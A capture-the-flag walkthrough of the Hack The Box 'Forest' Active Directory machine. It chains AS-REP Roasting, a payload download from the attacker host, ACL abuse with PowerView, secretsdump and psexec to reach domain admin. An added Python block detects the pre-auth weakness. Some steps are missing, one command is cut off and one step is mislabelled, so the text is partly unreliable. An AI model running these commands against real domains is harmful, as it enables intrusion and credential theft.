
HTB Forest

https://app.hackthebox.com/machines/Forest


Enumeration


Nmap

A Domain Controller for the htb.local domain is found.

SMB

RPC

Found a service account.

Let’s test for users that do not require Kerberos pre-authentication.

Create a user list with the found users.

Start up kerbrute

User accounts that are enabled and have pre-authentication disabled are vulnerable to an AS-REP Roasting attack.

Use the Impacket GetNPUsers.py from here.

Run the python script to dump out the hash.

./GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161

Use John to crack the hash.
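As an added defender-side example (not from the original writeup), the following Python checks the two things a blue team would look at for the AS-REP Roasting step above: accounts whose userAccountControl has DONT_REQ_PREAUTH set while still enabled, and Kerberos 4768 (TGT requested) events with Pre-Authentication Type 0. The account list and events are constructed sample data; the 10.10.14.23 address reuses the attacking host shown later on this page.

```python
# Defender-side audit for the AS-REP Roasting condition described above.
# All directory data and events below are constructed samples.

UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed LDAP export: sAMAccountName -> userAccountControl (decimal, as AD returns it).
SAMPLE_ACCOUNTS = {
    "svc-alfresco": 4260352,   # 0x410200: NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH
    "administrator": 66048,    # 0x10200:  NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "old-svc": 4260354,        # 0x410202: like svc-alfresco, but ACCOUNTDISABLE is set
    "sebastien": 66048,
}

# Constructed Security log 4768 events, reduced to the EventData fields that matter.
SAMPLE_4768 = [
    {"TargetUserName": "svc-alfresco", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.23"},
    {"TargetUserName": "sebastien", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
    {"TargetUserName": "administrator", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
]


def asrep_roastable(accounts):
    """Return enabled accounts with pre-authentication disabled, sorted by name.

    These are exactly the accounts GetNPUsers.py can pull an AS-REP hash for.
    """
    return sorted(
        name for name, uac in accounts.items()
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE
    )


def suspicious_tgt_requests(events):
    """Flag 4768 events where a TGT was issued with PreAuthType 0 (no pre-auth).

    Returns (account, source IP, used_rc4) tuples. RC4 (0x17) is noted because
    that is the encryption type of the AS-REP hash that gets cracked offline.
    """
    hits = []
    for event in events:
        if event.get("PreAuthType") == "0":
            hits.append((event["TargetUserName"], event["IpAddress"],
                         event["TicketEncryptionType"] == "0x17"))
    return hits


if __name__ == "__main__":
    print("Roastable accounts:", asrep_roastable(SAMPLE_ACCOUNTS))
    print("TGTs issued without pre-auth:", suspicious_tgt_requests(SAMPLE_4768))
```

The fix on the directory side is to clear the "Do not require Kerberos preauthentication" flag on any account the first function reports; the second function is the log-side check that would have caught the GetNPUsers.py request above.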


Use evil-winrm to gain access.

First flag is found.

Use the BloodHound Python collector to gather the JSON data for the BloodHound app.

Load the data into BloodHound and look at the svc-alfresco node.

The node belongs to the Account Operators group.

Members of the Account Operators group are allowed to create and modify users and add them to non-protected groups.

Download the PowerSploit dev module from GitHub and start a Python web server to transfer the PowerView script to the Windows box.

powershell Invoke-WebRequest -Uri http://10.10.14.23:80/PowerView.ps1 -OutFile PowerView.ps1

Enter the following commands:

$pass = ConvertTo-SecureString 'password' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ('HTB\persecure', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity persecure -

Use secretsdump.py to get the hashes.


Crack the hash with crackmapexec


Use psexec.py to gain a shell.

Root flag is found.
